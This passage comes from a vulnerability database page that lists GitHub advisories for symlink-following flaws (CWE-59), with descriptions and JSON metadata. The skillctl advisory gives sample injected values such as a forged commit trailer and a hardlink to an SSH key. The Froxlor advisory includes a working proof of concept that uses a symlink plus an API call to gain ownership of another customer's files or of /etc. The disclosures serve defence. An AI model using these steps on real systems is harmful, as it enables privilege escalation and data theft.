Common Weakness Enumeration

CWE-59

Allowed

Improper Link Resolution Before File Access ('Link Following')

Abstraction: Base · Status: Draft

The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.

1986 vulnerabilities reference this CWE, most recent first.

GHSA-7372-Q459-JXHR

Vulnerability from github – Published: 2022-05-17 01:27 – Updated: 2024-10-16 20:40
VLAI
Summary
pyxdg Arbitrary File Overwrite via Race Condition
Details

Race condition in the xdg.BaseDirectory.get_runtime_dir function in pyxdg 0.25 allows local users to overwrite arbitrary files by pre-creating /tmp/pyxdg-runtime-dir-fallback-victim to point to a victim-owned location, then replacing it with a symlink to an attacker-controlled location once the get_runtime_dir function is called.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.25"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "pyxdg"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.26"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2014-1624"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-08-16T22:48:18Z",
    "nvd_published_at": "2014-01-28T00:55:00Z",
    "severity": "LOW"
  },
  "details": "Race condition in the `xdg.BaseDirectory.get_runtime_dir` function in pyxdg 0.25 allows local users to overwrite arbitrary files by pre-creating `/tmp/pyxdg-runtime-dir-fallback-victim` to point to a victim-owned location, then replacing it with a symlink to an attacker-controlled location once the `get_runtime_dir` function is called.",
  "id": "GHSA-7372-q459-jxhr",
  "modified": "2024-10-16T20:40:52Z",
  "published": "2022-05-17T01:27:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-1624"
    },
    {
      "type": "WEB",
      "url": "https://github.com/takluyver/pyxdg/commit/bd999c1c3fe7ee5f30ede2cf704cf03e400347b4"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90618"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyxdg/PYSEC-2014-95.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/takluyver/pyxdg"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20200227194825/http://www.securityfocus.com/bid/65042"
    },
    {
      "type": "WEB",
      "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=736247"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2014/01/21/3"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2014/01/21/4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "pyxdg Arbitrary File Overwrite via Race Condition"
}

GHSA-737Q-974Q-J2P4

Vulnerability from github – Published: 2022-05-01 17:49 – Updated: 2022-05-01 17:49
VLAI
Details

Certain setuid DB2 binaries in IBM DB2 before 9 Fix Pack 2 for Linux and Unix allow local users to overwrite arbitrary files via a symlink attack on the DB2DIAG.LOG temporary file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2007-1027"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2007-02-21T11:28:00Z",
    "severity": "MODERATE"
  },
  "details": "Certain setuid DB2 binaries in IBM DB2 before 9 Fix Pack 2 for Linux and Unix allow local users to overwrite arbitrary files via a symlink attack on the DB2DIAG.LOG temporary file.",
  "id": "GHSA-737q-974q-j2p4",
  "modified": "2022-05-01T17:49:39Z",
  "published": "2022-05-01T17:49:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2007-1027"
    },
    {
      "type": "WEB",
      "url": "http://osvdb.org/34024"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/24213"
    },
    {
      "type": "WEB",
      "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1IY94817"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/22614"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id?1017665"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id?1017695"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2007/0652"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-73H4-4M3X-58H5

Vulnerability from github – Published: 2025-09-19 21:31 – Updated: 2025-09-24 21:30
VLAI
Details

Vasion Print (formerly PrinterLogic) Virtual Appliance Host versions prior to 22.0.843 and Application prior to 20.0.1923 (macOS/Linux client deployments) contain an arbitrary file write vulnerability via the response file handling. When tasks produce output the service writes response data into files under /opt/PrinterInstallerClient/tmp/responses/ reusing the requested filename. The service follows symbolic links in the responses directory and writes as the service user (typically root), allowing a local, unprivileged user to cause the service to overwrite or create arbitrary files on the filesystem as root. This can be used to modify configuration files, replace or inject binaries or drivers, and otherwise achieve local privilege escalation and full system compromise.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-34191"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-19T19:15:39Z",
    "severity": "HIGH"
  },
  "details": "Vasion Print (formerly PrinterLogic) Virtual Appliance Host versions prior to 22.0.843 and Application prior to 20.0.1923 (macOS/Linux client deployments) contain an arbitrary file write vulnerability via the response file handling. When tasks produce output the service writes response data into files under /opt/PrinterInstallerClient/tmp/responses/ reusing the requested filename. The service follows symbolic links in the responses directory and writes as the service user (typically root), allowing a local, unprivileged user to cause the service to overwrite or create arbitrary files on the filesystem as root. This can be used to modify configuration files, replace or inject binaries or drivers, and otherwise achieve local privilege escalation and full system compromise.",
  "id": "GHSA-73h4-4m3x-58h5",
  "modified": "2025-09-24T21:30:35Z",
  "published": "2025-09-19T21:31:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34191"
    },
    {
      "type": "WEB",
      "url": "https://help.printerlogic.com/saas/Print/Security/Security-Bulletins.htm"
    },
    {
      "type": "WEB",
      "url": "https://help.printerlogic.com/va/Print/Security/Security-Bulletins.htm"
    },
    {
      "type": "WEB",
      "url": "https://pierrekim.github.io/blog/2025-04-08-vasion-printerlogic-83-vulnerabilities.html#mac-arbitrary-file-write"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/vasion-print-printerlogic-arbitrary-file-write-as-root-via-response-path-symlink-follow"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-73H7-C2XM-9MRV

Vulnerability from github – Published: 2022-05-24 17:26 – Updated: 2022-12-06 21:30
VLAI
Details

A flaw was found in chrony versions before 3.5.1 when creating the PID file under the /var/run/chrony folder. The file is created during chronyd startup while still running as the root user, and when it's opened for writing, chronyd does not check for an existing symbolic link with the same file name. This flaw allows an attacker with privileged access to create a symlink with the default PID file name pointing to any destination file in the system, resulting in data loss and a denial of service due to the path traversal.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-14367"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-08-24T15:15:00Z",
    "severity": "LOW"
  },
  "details": "A flaw was found in chrony versions before 3.5.1 when creating the PID file under the /var/run/chrony folder. The file is created during chronyd startup while still running as the root user, and when it\u0027s opened for writing, chronyd does not check for an existing symbolic link with the same file name. This flaw allows an attacker with privileged access to create a symlink with the default PID file name pointing to any destination file in the system, resulting in data loss and a denial of service due to the path traversal.",
  "id": "GHSA-73h7-c2xm-9mrv",
  "modified": "2022-12-06T21:30:45Z",
  "published": "2022-05-24T17:26:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14367"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1870298"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WKABKNLCSC3MACCWU6OM2YGWVWFWFMU"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202008-23"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4475-1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-73J4-6XVF-JV3H

Vulnerability from github – Published: 2024-04-09 18:30 – Updated: 2024-04-09 18:30
VLAI
Details

Azure Monitor Agent Elevation of Privilege Vulnerability

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-29989"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-04-09T17:16:02Z",
    "severity": "HIGH"
  },
  "details": "Azure Monitor Agent Elevation of Privilege Vulnerability",
  "id": "GHSA-73j4-6xvf-jv3h",
  "modified": "2024-04-09T18:30:28Z",
  "published": "2024-04-09T18:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29989"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29989"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-73JW-PJCV-9RGM

Vulnerability from github – Published: 2022-05-13 01:04 – Updated: 2022-05-13 01:04
VLAI
Details

Puppet before 3.3.3 and 3.4 before 3.4.1 and Puppet Enterprise (PE) before 2.8.4 and 3.1 before 3.1.1 allows local users to overwrite arbitrary files via a symlink attack on unspecified files.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2013-4969"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2014-01-07T18:55:00Z",
    "severity": "LOW"
  },
  "details": "Puppet before 3.3.3 and 3.4 before 3.4.1 and Puppet Enterprise (PE) before 2.8.4 and 3.1 before 3.1.1 allows local users to overwrite arbitrary files via a symlink attack on unspecified files.",
  "id": "GHSA-73jw-pjcv-9rgm",
  "modified": "2022-05-13T01:04:16Z",
  "published": "2022-05-13T01:04:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-4969"
    },
    {
      "type": "WEB",
      "url": "http://puppetlabs.com/security/cve/cve-2013-4969"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/56253"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/56254"
    },
    {
      "type": "WEB",
      "url": "http://www.debian.org/security/2013/dsa-2831"
    },
    {
      "type": "WEB",
      "url": "http://www.ubuntu.com/usn/USN-2077-1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-744V-4277-8VR5

Vulnerability from github – Published: 2022-05-17 02:18 – Updated: 2022-05-17 02:18
VLAI
Details

ltpmenu in ltp 20060918 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/runltp.mainmenu.##### temporary file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2008-5145"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2008-11-18T16:00:00Z",
    "severity": "MODERATE"
  },
  "details": "ltpmenu in ltp 20060918 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/runltp.mainmenu.##### temporary file.",
  "id": "GHSA-744v-4277-8vr5",
  "modified": "2022-05-17T02:18:05Z",
  "published": "2022-05-17T02:18:05Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2008-5145"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/46715"
    },
    {
      "type": "WEB",
      "url": "http://lists.debian.org/debian-devel/2008/08/msg00285.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/32414"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-74P7-6H78-GW8P

Vulnerability from github – Published: 2026-06-22 22:45 – Updated: 2026-06-22 22:45
VLAI
Summary
skillctl: argument injection, path traversal in --dest, FIFO/device DoS, hardlink exfiltration, and commit-trailer forgery
Details

Impact

Following the path-safety patches in GHSA-wx3m-whqv-xv47 (v0.1.2), a comprehensive multi-angle audit surfaced five further vulnerabilities, now patched in v0.1.3:

  1. source_sha argument injection in git ls-tree (CRITICAL). InstalledSkill.source_sha deserialized from .skills.toml (committed, PR-mergeable) flowed unvalidated into git ls-tree -r -z <refspec> -- <path>. Because the refspec sits before --, an attacker who slipped a malicious .skills.toml into a PR could set source_sha = "--name-only" / --abbrev=0 / --output=… and corrupt the diff classifier (which drives pull / push destructive decisions), or forge a divergence state to trick push --on-divergence overwrite into clobbering the wrong content.
  2. FIFO / device / socket denial-of-service in copy_dir_all (CRITICAL). The file-type branch only checked is_dir() / is_symlink(); a FIFO inside a skill folder fell through to fs::copy, which blocks indefinitely waiting for a writer. A character device like /dev/zero would read until OOM. Reachable on skillctl add against any adversarial library.
  3. add --dest arbitrary-directory wipe in agent mode (HIGH). --dest accepted absolute paths and .. traversal without validation, so a single invocation skillctl add --dest /Users/victim/.ssh --on-conflict overwrite --skill <maliciously-named> would remove_dir_all arbitrary directories — no .skills.toml round-trip required. Reachable in any non-interactive / agent-driven workflow where flag values may be attacker-supplied.
  4. Commit-message trailer forgery via skill names (HIGH). Skill names were spliced verbatim into git commit -m "update skill: <name>" and into the commit.message field of --json output. A skill named foo\nCo-Authored-By: evil@x produced a forged commit trailer that downstream tooling (Linear, GitHub commit-bot, release-notes scrapers) treats as real authorship metadata.
  5. Hardlink exfiltration via the round-trip (HIGH). fs::symlink_metadata reports a regular file for hardlinks (shared inode), and fs::copy reads the target content. An untrusted agent writing <project>/my-skill/data as a hardlink to ~/.ssh/id_rsa would have shipped the SSH key content to the (possibly public) library on the next skillctl push or detect.

Patches

Fixed in v0.1.3:

  • InstalledSkill::validate rejects any source_sha that isn't 40–64 hex characters.
  • fs_util::copy_dir_all only allows regular files and directories; FIFO / socket / device / other special files are rejected with AppError::Config.
  • commands::add::resolve_destination rejects .. unconditionally and rejects absolute paths in non-interactive / --json mode.
  • New src/sanitize.rs module: validate_identifier (strict, no control bytes / newlines / ESC, used for skill name + individual tags) and validate_message_safe (lenient, allows \n + \t, rejects \r + DEL + C0/C1 controls, used for description and --message). Wired at the skill::discover and read_tags boundaries so poisoned skills are dropped silently and poisoned descriptions/tags are stripped from otherwise-valid skills.
  • fs_util::copy_dir_all checks metadata.nlink() > 1 on regular files (Unix) and refuses hardlinked content.

All checks are lexical or single-syscall (symlink_metadata, metadata). No canonicalize, no TOCTOU windows. 23 new unit + integration tests cover each rejection class; cargo test: 95 pass; clippy clean; cargo audit clean.

Workarounds

Upgrade to v0.1.3. Pre-patch mitigations are awkward but possible: - Audit every .skills.toml source_sha field before running skillctl pull / push / detect. - Audit library content for FIFO / device files and hardlinks before running skillctl add. - Never invoke skillctl add with attacker-controllable --dest values in agent / CI contexts. - Never use --message with attacker-controlled content.

Credit

The findings were surfaced by a maintainer-led multi-angle audit (6 parallel sub-agents, one per threat-model dimension) following the firebaguette audit that motivated v0.1.2. The methodology (cross-agent convergence to identify the most exploitable items) is documented in the project's internal decisions log; the strongest signal was the four-of-six independent convergence on the source_sha vector.

Resources

  • Fix commit: 28dfce3
  • Release: https://github.com/umanio-agency/skillctl/releases/tag/v0.1.3
  • Prior advisory (path-safety + symlinks): GHSA-wx3m-whqv-xv47
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "skillctl"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-400",
      "CWE-59",
      "CWE-88",
      "CWE-93"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-22T22:45:16Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Impact\n\nFollowing the path-safety patches in [GHSA-wx3m-whqv-xv47](https://github.com/umanio-agency/skillctl/security/advisories/GHSA-wx3m-whqv-xv47) (v0.1.2), a comprehensive multi-angle audit surfaced five further vulnerabilities, now patched in v0.1.3:\n\n1. **`source_sha` argument injection in `git ls-tree` (CRITICAL).** `InstalledSkill.source_sha` deserialized from `.skills.toml` (committed, PR-mergeable) flowed unvalidated into `git ls-tree -r -z \u003crefspec\u003e -- \u003cpath\u003e`. Because the refspec sits before `--`, an attacker who slipped a malicious `.skills.toml` into a PR could set `source_sha = \"--name-only\"` / `--abbrev=0` / `--output=\u2026` and corrupt the diff classifier (which drives `pull` / `push` destructive decisions), or forge a divergence state to trick `push --on-divergence overwrite` into clobbering the wrong content.\n2. **FIFO / device / socket denial-of-service in `copy_dir_all` (CRITICAL).** The file-type branch only checked `is_dir()` / `is_symlink()`; a FIFO inside a skill folder fell through to `fs::copy`, which blocks indefinitely waiting for a writer. A character device like `/dev/zero` would read until OOM. Reachable on `skillctl add` against any adversarial library.\n3. **`add --dest` arbitrary-directory wipe in agent mode (HIGH).** `--dest` accepted absolute paths and `..` traversal without validation, so a single invocation `skillctl add --dest /Users/victim/.ssh --on-conflict overwrite --skill \u003cmaliciously-named\u003e` would `remove_dir_all` arbitrary directories \u2014 no `.skills.toml` round-trip required. Reachable in any non-interactive / agent-driven workflow where flag values may be attacker-supplied.\n4. **Commit-message trailer forgery via skill names (HIGH).** Skill names were spliced verbatim into `git commit -m \"update skill: \u003cname\u003e\"` and into the `commit.message` field of `--json` output. A skill named `foo\\nCo-Authored-By: evil@x` produced a forged commit trailer that downstream tooling (Linear, GitHub commit-bot, release-notes scrapers) treats as real authorship metadata.\n5. **Hardlink exfiltration via the round-trip (HIGH).** `fs::symlink_metadata` reports a regular file for hardlinks (shared inode), and `fs::copy` reads the target content. An untrusted agent writing `\u003cproject\u003e/my-skill/data` as a hardlink to `~/.ssh/id_rsa` would have shipped the SSH key content to the (possibly public) library on the next `skillctl push` or `detect`.\n\n## Patches\n\nFixed in [v0.1.3](https://github.com/umanio-agency/skillctl/releases/tag/v0.1.3):\n\n- `InstalledSkill::validate` rejects any `source_sha` that isn\u0027t 40\u201364 hex characters.\n- `fs_util::copy_dir_all` only allows regular files and directories; FIFO / socket / device / other special files are rejected with `AppError::Config`.\n- `commands::add::resolve_destination` rejects `..` unconditionally and rejects absolute paths in non-interactive / `--json` mode.\n- New `src/sanitize.rs` module: `validate_identifier` (strict, no control bytes / newlines / ESC, used for skill `name` + individual `tags`) and `validate_message_safe` (lenient, allows `\\n` + `\\t`, rejects `\\r` + DEL + C0/C1 controls, used for `description` and `--message`). Wired at the `skill::discover` and `read_tags` boundaries so poisoned skills are dropped silently and poisoned descriptions/tags are stripped from otherwise-valid skills.\n- `fs_util::copy_dir_all` checks `metadata.nlink() \u003e 1` on regular files (Unix) and refuses hardlinked content.\n\nAll checks are lexical or single-syscall (`symlink_metadata`, `metadata`). No `canonicalize`, no TOCTOU windows. 23 new unit + integration tests cover each rejection class; `cargo test`: 95 pass; clippy clean; `cargo audit` clean.\n\n## Workarounds\n\nUpgrade to v0.1.3. Pre-patch mitigations are awkward but possible:\n- Audit every `.skills.toml` `source_sha` field before running `skillctl pull` / `push` / `detect`.\n- Audit library content for FIFO / device files and hardlinks before running `skillctl add`.\n- Never invoke `skillctl add` with attacker-controllable `--dest` values in agent / CI contexts.\n- Never use `--message` with attacker-controlled content.\n\n## Credit\n\nThe findings were surfaced by a maintainer-led multi-angle audit (6 parallel sub-agents, one per threat-model dimension) following the firebaguette audit that motivated v0.1.2. The methodology (cross-agent convergence to identify the most exploitable items) is documented in the project\u0027s internal decisions log; the strongest signal was the four-of-six independent convergence on the `source_sha` vector.\n\n## Resources\n\n- Fix commit: [28dfce3](https://github.com/umanio-agency/skillctl/commit/28dfce3)\n- Release: https://github.com/umanio-agency/skillctl/releases/tag/v0.1.3\n- Prior advisory (path-safety + symlinks): [GHSA-wx3m-whqv-xv47](https://github.com/umanio-agency/skillctl/security/advisories/GHSA-wx3m-whqv-xv47)",
  "id": "GHSA-74p7-6h78-gw8p",
  "modified": "2026-06-22T22:45:16Z",
  "published": "2026-06-22T22:45:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/umanio-agency/skillctl/security/advisories/GHSA-74p7-6h78-gw8p"
    },
    {
      "type": "WEB",
      "url": "https://github.com/umanio-agency/skillctl/security/advisories/GHSA-wx3m-whqv-xv47"
    },
    {
      "type": "WEB",
      "url": "https://github.com/umanio-agency/skillctl/commit/28dfce3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/umanio-agency/skillctl"
    },
    {
      "type": "WEB",
      "url": "https://github.com/umanio-agency/skillctl/releases/tag/v0.1.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "skillctl: argument injection, path traversal in --dest, FIFO/device DoS, hardlink exfiltration, and commit-trailer forgery"
}

GHSA-75CR-RJWP-W5RP

Vulnerability from github – Published: 2022-05-24 17:42 – Updated: 2022-05-24 17:42
VLAI
Details

Digi ConnectPort X2e before 3.2.30.6 allows an attacker to escalate privileges from the python user to root via a symlink attack that uses chown, related to /etc/init.d/S50dropbear.sh and the /WEB/python/.ssh directory.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-12878"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-02-18T00:15:00Z",
    "severity": "HIGH"
  },
  "details": "Digi ConnectPort X2e before 3.2.30.6 allows an attacker to escalate privileges from the python user to root via a symlink attack that uses chown, related to /etc/init.d/S50dropbear.sh and the /WEB/python/.ssh directory.",
  "id": "GHSA-75cr-rjwp-w5rp",
  "modified": "2022-05-24T17:42:35Z",
  "published": "2022-05-24T17:42:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12878"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fireeye/Vulnerability-Disclosures"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fireeye/Vulnerability-Disclosures/blob/master/FEYE-2020-0020/FEYE-2020-0020.md"
    },
    {
      "type": "WEB",
      "url": "https://www.digi.com/support/productdetail?pid=5570"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-75H4-C557-J89R

Vulnerability from github – Published: 2026-04-16 00:47 – Updated: 2026-04-24 20:54
VLAI
Summary
Froxlor has Incomplete Symlink Validation in DataDump.add() Allows Arbitrary Directory Ownership Takeover via Cron
Details

Summary

DataDump.add() constructs the export destination path from user-supplied input without passing the $fixed_homedir parameter to FileDir::makeCorrectDir(), bypassing the symlink validation that was added to all other customer-facing path operations (likely as the fix for CVE-2023-6069). When the ExportCron runs as root, it executes chown -R on the resolved symlink target, allowing a customer to take ownership of arbitrary directories on the system.

Details

The vulnerability is an incomplete patch. After CVE-2023-6069, symlink validation was added to FileDir::makeCorrectDir() via a $fixed_homedir parameter. When provided, it walks each path component checking for symlinks that escape the customer's home directory (lines 134-157 of lib/Froxlor/FileDir.php).

Every customer-facing API command that builds a path from user input passes this parameter:

// DirProtections.php:87
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

// DirOptions.php:96
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

// Ftps.php:178
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

// SubDomains.php:585
return FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

But DataDump.add() was missed:

// DataDump.php:88 — NO $fixed_homedir parameter
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path);

The path flows unvalidated into a cron task (lib/Froxlor/Api/Commands/DataDump.php:133):

Cronjob::inserttask(TaskId::CREATE_CUSTOMER_DATADUMP, $task_data);

When ExportCron::handle() runs as root, it executes at lib/Froxlor/Cron/System/ExportCron.php:232:

FileDir::safe_exec('chown -R ' . (int)$data['uid'] . ':' . (int)$data['gid'] . ' ' . escapeshellarg($data['destdir']));

The chown -R command follows symlinks in its target argument. If $data['destdir'] resolves through a symlink to an arbitrary directory, the attacker's UID/GID is applied recursively to that directory and all its contents.

The Validate::validate() call on line 86 uses an empty pattern, which falls back to /^[^\r\n\t\f\0]*$/D — this only strips control characters and does not prevent symlink names. makeSecurePath() strips shell metacharacters and .. traversal but does not check for symlinks.

PoC

Prerequisites: - system.exportenabled = 1 (admin setting) - Customer account with API key and FTP/SSH access

# Step 1: Create a symlink inside the customer's docroot pointing to a victim directory
# (customer has FTP/SSH access to their own docroot)
ssh customer@server 'ln -s /var/customers/webs/victim_customer /var/customers/webs/attacker_customer/steal'

# Step 2: Schedule data export via API with path pointing to the symlink
curl -X POST \
  -H "Content-Type: application/json" \
  -d '{"header":{"apikey":"CUSTOMER_API_KEY","secret":"CUSTOMER_API_SECRET"},"body":{"command":"DataDump.add","params":{"path":"steal","dump_web":"1"}}}' \
  https://panel.example.com/api.php

# Expected response: 200 OK with task_data including destdir

# Step 3: Wait for ExportCron to run (hourly cron as root)
# The cron executes:
#   mkdir -p '/var/customers/webs/attacker_customer/steal/'       (follows symlink, dir exists)
#   tar cfz ... -C /var/customers/webs/attacker_customer/ .       (tars attacker's web data)
#   chown -R <attacker_uid>:<attacker_gid> '/var/customers/webs/attacker_customer/steal/.tmp/'
#   mv export.tar.gz '/var/customers/webs/attacker_customer/steal/'
#   chown -R <attacker_uid>:<attacker_gid> '/var/customers/webs/attacker_customer/steal/'
#
# The final chown resolves the symlink and recursively chowns
# /var/customers/webs/victim_customer/ to the attacker's UID/GID.

# Step 4: Attacker now owns all of victim's web files
ssh customer@server 'ls -la /var/customers/webs/victim_customer/'
# All files now owned by attacker_customer UID

# For system-level escalation, the symlink can target /etc:
# ln -s /etc /var/customers/webs/attacker_customer/steal
# After cron: attacker owns /etc/passwd, /etc/shadow → root shell

Impact

  • Horizontal privilege escalation: A customer can take ownership of any other customer's web files, databases exports, and email data on the same server.
  • Vertical privilege escalation: By targeting system directories (e.g., /etc), the customer can gain read/write access to /etc/passwd and /etc/shadow, enabling creation of a root account or password modification.
  • Data breach: Full read access to all files in the targeted directory tree, including configuration files with database credentials, application secrets, and user data.
  • Service disruption: Changing ownership of system directories can break system services.

The attack requires only a single API call and a symlink. The impact is delayed until the next cron run (typically hourly), making it harder to attribute.

Recommended Fix

Pass $customer['documentroot'] as the $fixed_homedir parameter in DataDump.add(), consistent with every other API command:

// lib/Froxlor/Api/Commands/DataDump.php, line 88
// Before (vulnerable):
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path);

// After (fixed):
$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

Additionally, the ExportCron should use chown -h (no-dereference) or validate the destination path is not a symlink before executing chown -R:

// lib/Froxlor/Cron/System/ExportCron.php, line 232
// Add symlink check before chown
if (is_link(rtrim($data['destdir'], '/'))) {
    $cronlog->logAction(FroxlorLogger::CRON_ACTION, LOG_ERR, 'Export destination is a symlink, skipping chown for security: ' . $data['destdir']);
} else {
    FileDir::safe_exec('chown -R ' . (int)$data['uid'] . ':' . (int)$data['gid'] . ' ' . escapeshellarg($data['destdir']));
}
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "froxlor/froxlor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41231"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T00:47:18Z",
    "nvd_published_at": "2026-04-23T04:16:19Z",
    "severity": "HIGH"
  },
